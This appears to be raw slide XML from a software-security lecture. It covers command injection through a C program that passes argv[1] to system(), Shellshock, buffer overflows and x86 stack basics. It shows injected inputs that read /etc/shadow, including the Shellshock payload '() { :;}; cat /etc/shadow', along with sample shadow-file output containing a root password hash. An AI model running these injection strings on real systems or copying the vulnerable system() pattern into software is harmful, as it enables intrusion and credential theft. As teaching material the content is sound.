                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argc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char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1024];</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snprintf(cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, 1024, "cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>var/log/%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>", argv[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  cmd[1023] = '\0';</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return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>system(cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</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prog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> "foo; cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/shadow"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/log/foo: file not found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>root:$1$LtWqGee9$jLrc8CWVMx6oAA8WKzS5Z1:16661:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>daemon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:*:16652:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="5657850"/>
            <a:ext cx="685800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD5F6748-727B-F942-A49F-96C7BB40957B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141409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Real Example: Shellshock</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On September 2014, a new bug in how bash processes its environment variable was disclosed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The bash program can pass its environment to other instances of bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In addition to variables a bash instance can pass to another instance one or more function definitions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is accomplished by setting environment variables whose value start with ‘()’ followed by a function definition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The function definition is the executed by the interpreter to create the function  	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57107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Real Example: Shellshock</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By appending commands to the function definition, it is possible to execute arbitrary code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: If a user has access to a limited-access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> account he/she can break out of the restricted shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When a command that is not the allowed one is requested, the original command is put in the variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>$SSH_ORIGINAL_COMMAND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By passing as a command the string:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>() { :;}; cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The command will be put in the environment variable and interpreted, resulting in the injected command executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also, CGI web applications pass arguments through environment variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can execute arbitrary code through a web request!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99865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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overflows/Overwrites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433155" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The lack of boundary checking is one of the most common mistakes in C/C++ applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overflows are one of the most popular type of attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Architecture/OS version dependant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be exploited both locally and remotely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can modify both the data and the control flow of an application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recent tools have made the process of exploiting overflows easier if not completely automatic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Much research has been devoted to finding vulnerabilities, designing prevention techniques, and developing detection mechanisms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some of these mechanisms have found their way to mainstream operating system (non-executable stack, layout randomization)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85126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3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3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3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3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31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31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315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331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Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack is essentially scratch memory for functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used in MIPS, ARM, x86, and x86-64 processors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Starts at high memory addresses and grows down</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Functions are free to push registers or values onto the stack, or pop values from the stack into registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The assembly language supports this on x86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> holds the address of the top of the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> decrements the stack pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) then stores the value in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to the location pointed to by the stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> stores the value at the location pointed to by the stack pointer into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, then increments the stack pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="118673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3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953845" y="177855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850512" y="319404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850512" y="359700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6245411" y="18712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633045" y="5147061"/>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469999" y="5140434"/>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633045" y="5515108"/>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469999" y="5521871"/>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47397" y="5883155"/>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469999" y="5883155"/>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217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1506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440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Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These vulnerabilities are flaws in the overall logic of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lack of authentication and/or authorization checks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Erroneous trust assumptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These vulnerabilities are the most difficult to identify automatically because they require a clear understanding of the functionality implemented by the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Confused Deputy problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152491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0xFFFC</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1506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850512" y="2858824"/>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790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1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0xFFFC</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82622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52</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0xFFFC</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81338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Example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Garbage</a:t>
                      </a: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53</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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xFFFFFFFF</a:t>
            </a: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0xa</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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</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p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">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168494" y="27728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383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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Functions would like to use the stack to allocate space for their local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can we use the stack pointer for this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Yes, however stack pointer can change throughout program execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frame pointer points to the start of the function's frame on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each local variable will be (different) offsets of the frame pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In x86, frame pointer is called the base pointer, and is stored in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235056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0836" y="1579420"/>
            <a:ext cx="2507673" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">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b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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float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c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="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 = 10;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  b = 100;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  c = 10.45;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  a = a + b;   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5112328" y="1600201"/>
